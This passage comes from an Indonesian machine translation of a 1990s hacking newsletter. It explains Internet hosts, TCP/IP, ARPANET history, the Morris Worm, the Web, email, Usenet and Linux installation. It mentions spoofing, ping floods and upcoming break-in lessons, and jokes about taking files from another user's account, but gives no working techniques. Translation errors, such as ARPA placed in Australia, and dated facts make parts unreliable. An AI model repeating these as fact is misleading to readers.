sebagai program "Terminal" Windows 3.1 di bawah ikon "Aksesoris". Setelah Anda menekan dan
terhubung Anda hanyalah terminal lain pada mesin host ini. Itu tidak akan memberi Anda gambar cantik. Ini
koneksi akan serupa dengan apa yang Anda dapatkan pada BBS kuno. Tetapi jika Anda tahu cara menggunakan jenis ini
koneksi, bahkan bisa memberi Anda akses root ke host itu.
Tetapi bagaimana komputer host yang Anda gunakan terpasang ke Internet? Ini akan menjalankan beberapa variasi Unix
sistem operasi. Karena Unix sangat mudah untuk beradaptasi dengan hampir semua komputer, ini berarti hampir semua komputer
komputer dapat menjadi host Internet.
Sebagai contoh, saya terkadang memasuki Internet melalui host yang merupakan komputer Silicon Graphics Indigo di
Universitas Negeri Utah. Alamat Internetnya adalah fantasia.idec.sdl.usu.edu. Ini adalah komputer yang dioptimalkan untuk
pekerjaan animasi komputer, tetapi juga dapat beroperasi sebagai host Internet. Pada kesempatan lain titik masuk
yang digunakan mungkin pegasus.unm.edu, yang merupakan IBM RS 6000 Model 370. Ini adalah komputer yang dioptimalkan
untuk
penelitian di Universitas New Mexico.
Komputer apa pun yang dapat menjalankan perangkat lunak yang diperlukan - yang pada dasarnya adalah sistem operasi Unix -
memiliki
modem, dan terkait dengan tautan komunikasi Internet, dapat menjadi simpul Internet. Bahkan PC pun bisa

Halaman 116
menjadi host Internet dengan menjalankan salah satu rasa Linux Unix. Setelah mengaturnya dengan Linux Anda bisa
mengatur dengan ISP pilihan Anda untuk menghubungkannya secara permanen ke Internet.
Faktanya, banyak ISP menggunakan tidak lebih dari PC jaringan yang menjalankan Linux!
Akibatnya, semua komputasi, penyimpanan data, dan pengiriman, penerimaan dan penerusan pesan di Internet
Internet ditangani oleh jutaan komputer dari berbagai jenis dan dimiliki oleh banyak perusahaan,
lembaga pendidikan, entitas pemerintah dan bahkan individu.
Masing-masing komputer ini memiliki alamat individual yang memungkinkan untuk dijangkau melalui Internet jika
terhubung ke tautan komunikasi yang sesuai. Alamat ini dapat direpresentasikan dalam dua cara: sebagai nama
atau angka.
Tautan komunikasi Internet juga dimiliki dan dipelihara dengan cara anarkis yang sama dengan Internet
tuan rumah. Setiap pemilik host internet bertanggung jawab untuk menemukan dan membayar tautan komunikasi itu
akan membuat host itu terikat dengan setidaknya satu host lainnya. Tautan komunikasi mungkin sesederhana telepon
line, tautan data nirkabel seperti data paket digital seluler, atau serumit serat optik kecepatan tinggi
link. Selama tautan komunikasi dapat menggunakan TCP / IP atau UUCP, tautan itu dapat masuk ke Internet.
Dengan demikian jaring tumbuh tanpa koordinasi keseluruhan. Pemilik baru host Internet hanya perlu mendapatkan izin
untuk mengikat ke dalam satu tautan komunikasi ke satu host lainnya. Atau, jika penyedia komunikasi
Tautan memutuskan bahwa host ini, misalnya, surga bagi spammer, dapat memotong "situs jahat" ini dari Internet.
Situs jahat kemudian harus snooker beberapa tautan komunikasi lain untuk mengikatnya ke Internet lagi.
Cara sebagian besar komputer dan tautan komunikasi yang saling terhubung ini bekerja melalui kesamaan
bahasa protokol TCP / IP. Pada dasarnya, TCP / IP memecah komunikasi Internet menjadi diskrit
"Paket." Setiap paket menyertakan informasi tentang cara merutekannya, koreksi kesalahan, dan alamat
pengirim dan penerima. Idenya adalah bahwa jika suatu paket hilang, pengirim akan mengetahuinya dan mengirim ulang paket
tersebut. Setiap
Paket ini kemudian diluncurkan ke Internet. Jaringan ini dapat secara otomatis memilih rute dari node ke node
untuk setiap paket menggunakan apa pun yang tersedia pada saat itu, dan menyusun kembali paket menjadi lengkap
pesan di komputer yang ditujukan.
Paket-paket ini dapat mengikuti rute berliku. Sebagai contoh, satu paket dapat beralih dari sebuah simpul di Boston ke
Amsterdam dan kembali ke AS untuk tujuan akhir di Houston, sementara paket lain dari yang sama
pesan mungkin dialihkan melalui Tokyo dan Athena, dan sebagainya. Namun, biasanya komunikasi
tautannya tidak begitu menyiksa. Tautan komunikasi dapat mencakup serat optik, saluran telepon, dan satelit.
Kekuatan jaringan packet-switched ini adalah bahwa sebagian besar pesan akan secara otomatis melewati
kemacetan lalu lintas pesan yang berat dan banyak tautan komunikasi yang tidak berfungsi. Kerugiannya adalah
bahwa pesan mungkin hilang begitu saja dalam sistem. Mungkin juga sulit menjangkau komputer yang diinginkan jika
terlalu banyak tautan komunikasi yang tidak tersedia saat itu.
Namun, semua fitur luar biasa ini juga dapat diretas. Internet cukup kuat untuk
bertahan hidup - demikian klaim penemunya - bahkan perang nuklir. Namun itu juga sangat lemah sehingga hanya sedikit
instruksi, adalah mungkin untuk belajar bagaimana cara spoof sistem (email palsu) atau bahkan untuk sementara waktu
keluar dari komisi komputer host internet orang lain (ping banjir, misalnya.)
Di sisi lain, header pada paket yang membawa perintah peretasan akan memberikan akun
informasi dari mana seorang hacker beroperasi. Untuk alasan ini sulit untuk bersembunyi dengan sempurna ketika di Internet
Internet.
Ketegangan antara kekuatan ini dan kekokohan dan kelemahan dan potensi untuk kebingungan yang membuat
Internet tempat bermain hacker.

Halaman 117
Sebagai contoh, DI SINI ADALAH TIP HACKER ANDA ANDA TELAH MENUNGGU MASALAH INI:
ftp://ftp.secnet.com
Situs ftp ini diposting pada daftar BUGTRAQ, yang didedikasikan untuk diskusi tentang lubang keamanan Unix.
Moderator adalah Aleph One, yang merupakan Uberhacker asli. Jika Anda ingin berlangganan BUGTRAQ, email
LISTSERV@netspace.org dengan pesan "berlangganan BUGTRAQ."
Sekarang, kembali ke dasar-dasar Internet.
Sejarah Internet
Seperti disebutkan di atas, Internet lahir sebagai upaya Badan Penelitian Proyek Lanjut AS (ARPA) di Australia
1969. Para penemunya menyebutnya ARPANET. Tetapi karena nilainya dalam penelitian ilmiah, US National
Science Foundation (NSF) mengambil alih pada tahun 1983. Namun selama bertahun-tahun sejak itu secara bertahap
berkembang jauh dari
sumber kontrol tunggal. Pada April 1995 NSF memotong string apron terakhir. Sekarang internet dijalankan oleh siapa pun.
Itu hanya terjadi dan tumbuh dari upaya mereka yang bermain dengannya dan berjuang dengan perangkat lunak dan
perangkat keras.
Tidak ada yang seperti ini yang pernah terjadi sebelumnya. Kami sekarang memiliki sistem komputer dengan kehidupannya
sendiri.
Kami, sebagai peretas, membentuk bagian besar dari mesin mutasi yang membuat Internet terus berkembang dan berkembang
lebih kuat. Kami juga membentuk bagian besar dari sistem kekebalan makhluk eksotis ini.
Gagasan asli ARPANET adalah merancang komputer dan jaringan komunikasi yang nantinya
akhirnya menjadi begitu berlebihan, begitu kuat, dan mampu beroperasi tanpa kontrol terpusat, sehingga bisa
bahkan selamat dari perang nuklir. Apa yang juga terjadi adalah bahwa ARPANET berevolusi menjadi makhluk yang selamat
akhir dari pendanaan pemerintah bahkan tanpa blip dalam pertumbuhannya. Dengan demikian keturunannya yang anarkis,
Internet,
telah berhasil melampaui impian terliar dari arsitek aslinya.
Internet telah tumbuh secara eksplosif, tanpa akhir yang terlihat. Pada awal berdirinya sebagai ARPANET, ia hanya memiliki 4
host.
Seperempat abad kemudian, pada tahun 1984, hanya berisi 1000 host. Tetapi selama 5 tahun ke depan jumlah ini bertambah
sepuluh kali lipat menjadi 10.000 (1989). Selama 4 tahun berikutnya tumbuh sepuluh kali lipat menjadi 1 juta (1993). Dua tahun
kemudian, pada akhir 1995, Internet diperkirakan memiliki setidaknya 6 juta komputer host. Ada
mungkin lebih dari 10 juta sekarang. Tampaknya belum ada akhir yang terlihat bagi pertumbuhan mutan yang luar biasa ini
anak dari ARPANET.
Bahkan, satu kekhawatiran yang diangkat oleh pertumbuhan eksponensial di Internet adalah bahwa permintaan pada akhirnya
mungkin jauh
kapasitas outrace. Karena sekarang tidak ada entitas yang memiliki atau mengendalikan Internet, jika kapasitasnya
tautan komunikasi antar node terlalu kecil, dan itu mungkin akan menjadi sangat macet, mungkin saja
sulit untuk memperbaiki masalah.
Sebagai contoh, pada tahun 1988, Robert Morris, Jr mengeluarkan program tipe "virus" di Internet yang umum dikenal
sebagai "Morris Worm." Virus ini akan membuat salinan dirinya pada komputer apa pun itu dan kemudian
mengirim salinan melalui tautan komunikasi ke host Internet lainnya. (Ini menggunakan bug di sendmail yang diizinkan
akses ke root, memungkinkan virus untuk bertindak sebagai superuser).
Cepat penyebaran virus ini secara eksponensial membuat Internet runtuh dari lalu lintas komunikasi dan
ruang disk itu diikat.
Pada saat itu Internet masih berada di bawah semacam kontrol oleh National Science Foundation dan
terhubung hanya ke beberapa ribu komputer. Internet dimatikan dan semua virus dibersihkan dari virusnya
komputer host, dan kemudian Net dioperasikan kembali. Morris, sementara itu, dipenjara.

Halaman 118
Ada beberapa kekhawatiran bahwa, meskipun langkah-langkah keamanan ditingkatkan (misalnya, "firewall"), seseorang
mungkin
menemukan cara baru untuk meluncurkan virus yang dapat mematikan Internet lagi. Mengingat hilangnya terpusat
kontrol, memulai kembali itu bisa jauh lebih menyita waktu jika ini terjadi lagi.
Tetapi membangun kembali kontrol terpusat hari ini seperti apa yang ada pada saat "Morris Worm" mungkin
tidak mungkin. Bahkan jika itu mungkin, arsitek ARPANET asli mungkin benar di dalamnya
penilaian bahwa Internet akan menjadi lebih rentan terhadap kegagalan besar daripada sedikit jika beberapa
kontrol terpusat ada di tempat.
Mungkin satu-satunya fitur terpenting dari Internet saat ini adalah kurangnya kontrol terpusat. Tidak ada orang
atau organisasi sekarang dapat mengendalikan Internet. Bahkan, kesulitan kontrol menjadi masalah sedini mungkin
sebagai tahun pertama operasinya sebagai ARPANET. Pada tahun itu, email diciptakan secara spontan oleh para penggunanya.
Untuk
kejutan para manajer ARPANET, pada tahun kedua email menyumbang sebagian besar
komunikasi melalui sistem.
Karena Internet telah tumbuh untuk memiliki kehidupan yang sepenuhnya otonom dan terdesentralisasi sendiri, pada bulan April
1995, Internet
NSF berhenti mendanai NSFNET, tulang punggung komunikasi serat optik yang pernah memberi NSF
teknologi untuk mengendalikan sistem. Proliferasi tautan komunikasi paralel dan host pada saat itu
sepenuhnya mem-bypass kemungkinan kontrol terpusat.
Ada beberapa fitur utama dari Internet:
* World Wide Web - jaringan penerbitan hypertext dan sekarang merupakan bagian Internet yang paling cepat berkembang.
* email - cara untuk mengirim pesan elektronik
* Usenet - forum di mana orang dapat memposting dan melihat pesan publik
* telnet - cara untuk masuk ke komputer Internet jarak jauh
* protokol transfer file - cara untuk mengunduh file dari komputer Internet jarak jauh
* Obrolan Internet relay - percakapan teks waktu-nyata - terutama digunakan oleh peretas dan pengguna internet lama lainnya
* gopher - cara katalogisasi dan mencari informasi. Ini dengan cepat menjadi usang.
Seperti yang Anda ketahui, ada banyak layanan lain yang menarik tetapi kurang terkenal seperti whois,
jari, ping dll
World Wide Web
World Wide Web adalah fitur utama terbaru dari Internet, yang berasal dari musim semi 1992. Terdiri dari itu
dari "halaman Web," yang seperti halaman dalam buku, dan tautan dari kata, frasa, atau simbol yang ditandai khusus
pada setiap halaman ke halaman Web lainnya. Halaman dan tautan ini bersama-sama menciptakan apa yang dikenal sebagai
"hypertext."
Teknik ini memungkinkan untuk menyatukan banyak dokumen berbeda yang dapat ditulis oleh banyak orang
orang dan disimpan di banyak komputer berbeda di seluruh dunia menjadi satu dokumen hypertext.
Teknik ini didasarkan pada standar Universal Resource Locator (URL), yang menentukan cara mengait
dengan komputer dan akses file di dalamnya di mana data halaman Web dapat disimpan.
URL selalu berupa http: // <sisa alamat>, di mana <sisa alamat> menyertakan nama domain
yang harus terdaftar dengan organisasi bernama InterNIC untuk memastikan bahwa dua Web berbeda
halaman (atau alamat email, atau alamat komputer) pada akhirnya tidak sama. Registrasi ini adalah salah satunya
beberapa fitur kontrol terpusat dari Internet.
Inilah cara kerja hypertext dari World Wide Web. Pembaca akan datang ke pernyataan seperti
"Perusahaan kami menawarkan layanan truk LTL ke semua kota besar AS." Jika pernyataan ini pada "halaman Web" adalah
disorot, itu berarti bahwa klik mouse komputer pembaca akan membawanya ke halaman Web baru
dengan rincian. Ini mungkin termasuk jadwal lengkap dan formulir untuk diisi untuk memesan pickup dan pengiriman.

Halaman 119
Beberapa halaman Web bahkan menawarkan cara untuk melakukan pembayaran elektronik, biasanya melalui kartu kredit.
Namun, keamanan transfer uang melalui Internet masih menjadi masalah besar. Namun terlepas dari kekhawatiran dengan
verifikasi transaksi keuangan, perdagangan elektronik melalui Web tumbuh cepat. Di penuh kedua
tahun keberadaannya, 1994, hanya sekitar $ 17,6 juta dalam penjualan dilakukan melalui Web. Namun pada 1995, penjualan
mencapai $ 400 juta. Hari ini, pada tahun 1996, Web macet dengan situs komersial yang meminta kartu kredit Anda
informasi.
Selain itu, Web sedang digunakan sebagai alat dalam distribusi bentuk mata uang baru, yang dikenal sebagai
uang elektronik. Bisa dibayangkan bahwa, jika rintangan verifikasi dapat diatasi, uang tunai elektronik itu
(sering disebut ecash) dapat memainkan peran utama dalam ekonomi dunia, menyederhanakan perdagangan internasional.
Mungkin juga
akhirnya membuat mata uang nasional dan bahkan pajak seperti yang kita tahu sudah usang.
Contoh situs Web di mana seseorang dapat memperoleh ecash termasuk Mark Twain Bank of St. Louis, MO
(http://www.marktwain.com) dan Digicash of Amsterdam, Belanda (http://www.digicash.com).
Sifat Internet yang hampir tidak terkendali memanifestasikan dirinya di World Wide Web. Penulis a
Halaman web tidak perlu mendapatkan izin atau membuat pengaturan apa pun dengan penulis halaman Web lain
di mana ia ingin membangun tautan. Tautan dapat dibuat secara otomatis hanya dengan pemrograman
di URL tautan halaman Web yang diinginkan.
Sebaliknya, satu-satunya cara penulis halaman Web dapat mencegah orang lain membacanya atau membangun
tautan hypertext ke sana adalah untuk membuat sistem perlindungan kata sandi (atau dengan tidak memiliki tautan komunikasi ke
sisa Internet).
Masalah dengan World Wide Web adalah bagaimana menemukan hal-hal di dalamnya. Seperti halnya siapa pun dapat
mengaitkan komputer baru
hingga ke Internet, demikian juga tidak ada otoritas pusat dengan kontrol atau bahkan pengetahuan tentang apa yang
dipublikasikan
di mana di World Wide Web. Tidak ada yang perlu meminta izin dari otoritas pusat untuk memasang Web
halaman.
Setelah pengguna mengetahui alamat (URL) dari halaman Web, atau setidaknya URL dari halaman Web yang tertaut
akhirnya ke halaman yang diinginkan, maka dimungkinkan (asalkan tautan komunikasi tersedia) hampir
langsung terhubung dengan halaman ini.
Karena nilai mengetahui URL, sekarang ada banyak perusahaan dan lembaga akademik yang menawarkan
indeks yang dapat dicari (terletak di Web) ke World Wide Web. Program otomatis seperti Web
crawler mencari Web dan katalog URL yang mereka temui saat mereka melakukan perjalanan dari tautan hypertext ke
tautan hypertext. Tetapi karena Web terus tumbuh dan berubah, tidak ada cara untuk membuatnya
katalog komprehensif dari seluruh Web.
E-mail
Email adalah penggunaan Internet tertua kedua, sejak ARPAnet tahun 1972. (Penggunaan pertama adalah untuk
memungkinkan orang untuk login dari jarak jauh ke salah satu dari empat komputer yang menjadi lokasi ARPAnet
diluncurkan pada tahun 1971.)
Ada dua kegunaan utama email: komunikasi pribadi, dan email yang disiarkan. Saat disiarkan, ema il
berfungsi untuk membuat pengumuman (penyiaran satu arah), dan untuk melakukan diskusi di antara kelompok - kelompok dari
orang-orang seperti daftar Happy Hacker kami. Dalam mode diskusi grup, setiap pesan dikirim oleh setiap anggota
daftar disiarkan ke semua anggota lainnya.
Dua jenis program paling populer yang digunakan untuk menyiarkan ke grup diskusi email adalah majordomo dan
listserv.

Halaman 120
Usenet
Usenet adalah hasil alami dari daftar diskusi grup email yang disiarkan. Satu masalah dengan daftar email
adalah tidak ada cara mudah bagi orang yang baru bergabung dengan grup ini untuk bergabung dengan mereka. Masalah lain
adalah bahwa sebagai
grup tumbuh, anggota dapat dibanjiri dengan lusinan atau ratusan pesan email setiap hari.
Pada 1979 masalah ini diatasi dengan peluncuran Usenet. Usenet terdiri dari grup berita yang
lanjutkan diskusi dalam bentuk "posting." Tidak seperti grup diskusi email, posting ini disimpan,
biasanya selama dua minggu atau lebih, menunggu pembaca potensial. Ketika posting baru dikirimkan ke grup berita, mereka
disiarkan ke semua host Internet yang berlangganan untuk membawa grup berita ke mana posting ini
termasuk.
Dengan banyak program koneksi Internet Anda dapat melihat kesamaan antara Usenet dan email. Keduanya punya
header serupa, yang melacak pergerakan mereka melintasi Net. Beberapa program seperti Pine dikirim untuk dikirim
pesan yang sama secara bersamaan ke alamat email dan newsgroup. Semua pembaca berita Usenet mengizinkan
Anda mengirim email ke penulis posting, dan banyak juga yang memungkinkan Anda untuk mengirim email sendiri ke email
Anda sendiri atau
orang lain.
Sekarang, berikut adalah ikhtisar singkat tentang dasar-dasar Internet yang kami rencanakan akan dibahas dalam beberapa
masalah Panduan berikutnya
(kebanyakan) Peretasan Tidak Berbahaya:
1. Unix
Kami membahas "cangkang" yang memungkinkan seseorang untuk menulis program ("skrip") yang mengotomatisasi rangkaian
rumit Unix
perintah. Pembaca diperkenalkan dengan konsep skrip yang melakukan fungsi peretasan. Kita
memperkenalkan Perl, yang merupakan bahasa pemrograman shell yang digunakan untuk skrip peretasan paling elit seperti
SETAN.
3. TCP / IP dan UUCP
Bab ini membahas tautan komunikasi yang mengikat Internet dari sudut pandang peretas.
Perhatian ekstra diberikan kepada UUCP karena sangat bisa diretas.
4. Alamat Internet, Nama Domain dan Router
Pembaca belajar bagaimana informasi dikirim ke tempat yang tepat di Internet, dan bagaimana peretas dapat membuatnya
ke tempat yang salah! Cara mencari host UUCP (yang tidak di bawah sistem nama domain) adalah
termasuk.
5. Dasar-dasar Peretasan Elite: Ports, Paket, dan Izin File
Bagian ini memungkinkan jin peretasan serius keluar dari botol. Ini menawarkan serangkaian latihan di mana
pembaca dapat menikmati mendapatkan akses ke hampir semua host Internet yang dipilih secara acak. Bahkan, pada akhir
Bab Pembaca akan memiliki kesempatan untuk berlatih beberapa lusin teknik untuk mendapatkan masuk ke lainnya
komputer orang. Namun peretasan yang kami ajarkan ini 100% legal!
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 2 Angka 2
Linux!
________________________________________

Halaman 121
Unix telah menjadi sistem operasi utama Internet. Bahkan, Unix adalah operasi yang paling banyak digunakan
sistem di dunia di antara komputer dengan kekuatan lebih dari PC.
Benar, Windows NT muncul dengan cepat sebagai sistem operasi Internet yang umum, dan sangat luar biasa
kereta yang sepertinya bisa menjadi favorit nomor satu untuk ditembus. Tapi hari ini Unix dalam semua itu
rasa yang luar biasa masih merupakan sistem operasi yang harus diketahui untuk menjadi peretas yang benar-benar elit.
Sejauh ini kami mengasumsikan bahwa Anda telah meretas menggunakan akun shell yang Anda lewati
Penyedia Layanan Internet (ISP). Akun shell memungkinkan Anda untuk memberikan perintah Unix di salah satu ISP Anda
komputer. Tetapi Anda tidak perlu bergantung pada ISP Anda untuk mesin yang memungkinkan Anda bermain dengan Unix.
Kamu bisa
jalankan Unix di komputer Anda sendiri dan dengan koneksi SLIP atau PPP terhubung langsung ke Internet.
*************************
Catatan newbie: Serial Line Internet Protocol (SLIP) dan koneksi Point-to-Point Protocol (PPP) memberi Anda a
alamat Internet Protocol (IP) sementara yang memungkinkan Anda terhubung langsung ke Internet. Kamu harus
gunakan koneksi SLIP atau PPP untuk menggunakan browser Web yang memberi Anda gambar pada teks
hanya. Jadi jika Anda dapat melihat gambar di Web, Anda sudah memiliki salah satu dari ini tersedia untuk Anda.
Keuntungan menggunakan salah satu koneksi langsung ini untuk aktivitas peretasan Anda adalah Anda tidak akan pergi
di balik file log shell untuk sysadmin ISP Anda untuk meneliti. Bahkan jika Anda tidak melanggar hukum, sebuah log shell
File yang menunjukkan Anda melakukan banyak peretas hacker dapat cukup untuk beberapa sysadmin untuk menutup Anda
rekening.
********************
Apa jenis komputer terbaik untuk menjalankan Unix? Kecuali jika Anda adalah peretas kaya yang tidak memikirkan apa pun
membeli workstation Sun SPARC, Anda mungkin akan melakukan yang terbaik dengan semacam PC. Ada yang hampir tak
terhitung jumlahnya
varian Unix yang berjalan di PC, dan beberapa untuk Mac. Kebanyakan dari mereka gratis untuk diunduh, atau tidak mahal
tersedia dalam CD-ROM.
Tiga variasi Unix yang paling umum yang berjalan pada PC adalah Solaris Sun, FreeBSD dan Linux. Solaris
biaya sekitar $ 700. Cukup kata. FreeBSD benar-benar bagus. Tetapi Anda tidak menemukan banyak manual atau
newsgroup yang membahas FreeBSD.
Linux, bagaimanapun, memiliki keuntungan karena tersedia dalam banyak varian (sehingga Anda dapat bersenang-senang
mencampur dan
program yang cocok dari berbagai penawaran Linux). Yang paling penting, Linux didukung oleh banyak manual,
grup berita, daftar surat dan situs Web. Jika Anda memiliki teman peretas di daerah Anda, kebanyakan dari mereka mungkin
menggunakan
Linux dan dapat membantu Anda.
***********************
Catatan sejarah: Linux dibuat pada tahun 1991 oleh sebuah kelompok yang dipimpin oleh Linus Torvalds dari Universitas
Helsinki.
Linux memiliki hak cipta di bawah Lisensi Publik Umum GNU. Berdasarkan perjanjian ini, Linux mungkin
didistribusikan ke siapa pun bersama dengan kode sumber. Siapa pun dapat menjual varian Linux apa pun dan memodifikasinya
dan
mengemasnya kembali. Tetapi bahkan jika seseorang memodifikasi kode sumber dia tidak dapat mengklaim hak cipta untuk apa
pun
dibuat dari Linux. Siapa pun yang menjual versi Linux yang dimodifikasi harus memberikan kode sumber kepada pembeli
dan memungkinkan mereka untuk menggunakannya kembali dalam produk komersial mereka tanpa membebankan biaya lisensi.
Pengaturan ini
dikenal sebagai "copyleft."
Di bawah pengaturan ini pencipta Linux asli tidak menerima biaya lisensi atau shareware. Linus Torvalds
dan banyak lainnya yang telah berkontribusi pada Linux telah melakukannya dari kegembiraan pemrograman dan rasa
dari komunitas dengan kita semua yang mudah-mudahan akan menggunakan Linux dalam semangat peretasan orang baik. Viva
Linux! Viva
Torvalds!
**********************
Linux terdiri dari sistem operasi itu sendiri (disebut "kernel") ditambah satu set program terkait.

Halaman 122
Kernel, seperti semua jenis Unix, adalah sistem operasi multi-fungsi multi-pengguna. Meskipun menggunakan yang berbeda
struktur file, dan karenanya tidak secara langsung kompatibel dengan DOS dan Windows, sangat fleksibel sehingga banyak DOS
dan program Windows dapat dijalankan saat berada di Linux. Jadi pengguna yang kuat mungkin ingin boot di Linux
dan kemudian dapat menjalankan program DOS dan Windows dari Linux.
Program terkait yang datang dengan sebagian besar distribusi Linux dapat meliputi:
* program shell (Bourne Again Shell - BASH - adalah yang paling umum);
* kompiler untuk bahasa pemrograman seperti Fortran-77 (favorit saya!), C, C ++, Pascal, LISP, Modula-2,
Ada, Basic (bahasa terbaik untuk pemula), dan Smalltalk.;
* X (kadang-kadang disebut X-windows), antarmuka pengguna grafis
* program utilitas seperti pembaca email Pine (favorit saya) dan Elm
Sepuluh alasan utama untuk menginstal Linux di PC Anda:
1. Ketika Linux dilarang, hanya penjahat yang akan memiliki Linux.
2. Saat menginstal Linux, sangat menyenangkan menjalankan fdisk tanpa membuat cadangan terlebih dahulu.
3. Nyala api yang Anda dapatkan dari mengajukan pertanyaan di newsgroup Linux memiliki kualitas lebih tinggi daripada nyala
api
Anda dapatkan untuk posting ke alt.sex.bestiality.
4.Tidak peduli apa pun rasa Linux yang Anda instal, Anda akan tahu besok ada jauh lebih banyak 3l1te Anda
seharusnya mendapatkan sebagai gantinya.
5. Orang yang menggunakan BSD atau Solaris Gratis tidak akan mengolok-olok Anda. Mereka akan menawarkan simpati
sebagai gantinya.
6.Pada Def Con berikutnya Anda akan dapat mengatakan bega seperti "jadi saya su-ed ke akunnya dan mengambil semua file-
nya.
untuk 'kissyface'. "Ups, mengambil file orang lain adalah tidak-tidak, lupakan yang pernah saya sarankan.
7. Port berselancar di privasi.
8. Satu kata: eksploitasi.
9. Menginstal Linux di PC kantor Anda seperti menjadi pekerja pos dan membawa Uzi ke kantor.
10.Tapi - - jika Anda menginstal Linux di komputer kantor Anda, bos Anda tidak akan tahu apa artinya itu.
Jenis Linux apa yang paling berhasil? Tergantung pada apa yang Anda inginkan. Redhat Linux terkenal sebagai
termudah untuk menginstal. Perangkat CD-ROM Walnut Creek Linux 3.0 juga sangat mudah dipasang - untuk Linux, itu!
Pendekatan saya adalah mendapatkan banyak versi Linux dan mencampur dan mencocokkan yang terbaik dari setiap distribusi.
Saya paling menyukai versi Walnut Creek karena dengan perangkat keras merek X saya, fitur deteksi otomatisnya adalah
penghemat.
MENGINSTAL LINUX bukan untuk orang yang lemah hati! Beberapa tips untuk bertahan instalasi adalah:
1) Meskipun secara teori Anda dapat menjalankan Linux pada 286 dengan 4 MB RAM dan dua floppy drive, itu * banyak *
lebih mudah dengan 486 atau lebih tinggi dengan 8 MB RAM, CD-ROM, dan setidaknya 200 MB ruang hard disk kosong.
2) Ketahui sebanyak mungkin tentang apa jenis motherboard, modem, hard disk, CD-ROM, dan kartu video
kamu punya. Jika Anda memiliki dokumentasi untuk ini, siapkan untuk referensi selama instalasi.
3) Lebih baik menggunakan perangkat keras yang bermerek dan agak ketinggalan zaman di komputer Anda. Karena
Linux adalah freeware, tidak menawarkan driver perangkat untuk semua perangkat keras terbaru. Dan jika perangkat keras Anda
seperti milik saya -
- Banyak Merek X dan El Cheapo yang bisa Anda dapatkan, Anda dapat bereksperimen lama dengan driver apa yang akan
bekerja.
4) Sebelum memulai instalasi, buat cadangan hard disk Anda! Secara teori Anda dapat menginstal Linux tanpa merusak
file DOS / Windows Anda. Tetapi kita semua adalah manusia, terutama jika mengikuti saran dari poin 7).
5) Dapatkan lebih dari satu distribusi Linux. Pertama kali saya berhasil menginstal Linux, saya akhirnya berhasil
sesuatu yang bekerja dengan menggunakan disk boot dari satu distribusi dengan CD-ROM untuk yang lain. Dalam apapun
kasus, setiap distribusi Linux memiliki program utilitas yang berbeda, emulator sistem operasi, kompiler dan banyak lagi.
Tambahkan semuanya ke sistem Anda dan Anda akan diatur untuk menjadi di luar elit.

Halaman 123
6) Beli satu atau dua buku di Linux. Saya tidak suka salah satu dari mereka! Tapi mereka lebih baik daripada tidak sama sekali.
Paling
buku-buku di Linux dilengkapi dengan satu atau dua CD-ROM yang dapat digunakan untuk menginstal Linux. Tetapi saya
menemukan apa itu
dalam buku-buku tidak persis bertepatan dengan apa yang ada di CD-ROM.
7) Saya sarankan minum saat menginstal. Ini mungkin tidak membuat proses debug lebih cepat, tetapi setidaknya Anda tidak
akan melakukannya
peduli betapa sulitnya itu.
Sekarang saya hampir dapat menjamin bahwa meskipun mengikuti semua 6 saran ini, Anda masih akan mengalami masalah
menginstal Linux. Oh, apakah saya punya 7 penasihat di sana? Lupakan nomor 7. Tapi bersoraklah. Karena semuanya
lain juga menderita saat menginstal dan menggunakan Linux, Internet memiliki sumber daya yang luar biasa
untuk Linux -ditantang.
Jika Anda alergi terhadap dinyalakan, Anda dapat memulai dengan situs web dukungan Linux.
Yang terbaik yang saya temukan adalah http://sunsite.unc.edu:/pub/Linux/. Ini termasuk Linux yang Sering Ditanyakan
Daftar pertanyaan (FAQ), tersedia dari
sunsite.unc.edu:/pub/Linux/docs/FAQ.
Di direktori / pub / Linux / docs di sunsite.unc.edu Anda akan menemukan sejumlah dokumen lain tentang Linux,
termasuk Linux INFO-SHEET dan META-FAQ,
Arsip Linux HOWTO ada di situs web sunsite.unc.edu di: / pub / Linux / docs / HOWTO. Direktori
/ pub / Linux / docs / LDP berisi set manual LDP saat ini.
Anda bisa mendapatkan `` Instalasi Linux dan Memulai '' dari sunsite.unc.edu di / pub / Linux / docs / LDP / install-
panduan. File README di sana menjelaskan bagaimana Anda dapat memesan salinan cetak dari buku dengan nama yang sama
(sekitar 180 halaman).
Sekarang jika Anda tidak keberatan dinyalakan, Anda mungkin ingin memposting pertanyaan ke jumlah Usenet yang luar biasa
grup berita yang membahas Linux. Ini termasuk:
comp.os.linux.advocacy
Manfaat Linux dibandingkan
comp.os.linux.development.system
Kernel Linux, driver perangkat
comp.os.linux.x
Server Sistem Linux X Window
comp.os.linux.development.apps
Menulis aplikasi Linux
comp.os.linux.hardware
Kompatibilitas perangkat keras
comp.os.linux.setup
Instalasi Linux
comp.os.linux.networking
Jaringan dan komunikasi
comp.os.linux.answers
FAQ, How-To's, READMEs, dll.
linux.redhat.misc
alt.os.linux
Gunakan comp.os.linux. * Sebagai gantinya
alt.uu.comp.os.linux.questions
Universitas Usenet membantu Anda
comp.os.linux.announce
Pengumuman penting untuk Linux
comp.os.linux.misc
Topik khusus Linux
Ingin Linux Anda gratis? Tobin Fricke telah menunjukkan bahwa "salinan CD-ROM Linux gratis tersedia
Dukungan Linux & CD situs web Givaway di http://emile.math.ucsb.edu:8000/giveaway.html. Ini adalah proyek
di mana orang menyumbangkan CD Linux yang tidak lagi mereka butuhkan. Proyek ini diunggulkan oleh Sistem Linux
Labs, yang awalnya menyumbangkan 800 CD Linux! Harap ingat untuk menyumbangkan CD Linux Anda ketika Anda selesai
dengan mereka. Jika Anda tinggal di dekat pertemuan pertukaran komputer, Fry's, Microcenter, atau tempat lain semacam itu,
cari Linux
CD ada di sana. Mereka biasanya di bawah $ 20, yang merupakan investasi luar biasa. Saya pribadi suka Linux
Sumberdaya Pengembang oleh Infomagic, yang sekarang hingga tujuh set CD, saya percaya, yang mencakup semua mayor
Distribusi Linux (Slackware, Redhat, Debian, Linux untuk DEC Alpha untuk beberapa nama) plus mirror dari

Halaman 124
tsx11.mit.edu dan sunsite.unc.edu/pub/linux plus banyak lagi. Anda juga harus mengunjungi linux WONDERFUL
halaman di
http://sunsite.unc.edu/linux, yang memiliki banyak informasi, dan juga
http://www.linux.org/. Anda mungkin juga ingin check out
http://www.redhat.com/ dan http://www.caldera.com/ untuk informasi lebih lanjut
informasi tentang versi komersial linux (yang masih tersedia secara bebas di bawah GNU). "
Bagaimana dengan keamanan Linux? Ya, Linux, seperti setiap sistem operasi, tidak sempurna. Bisa dibajak, jika Anda
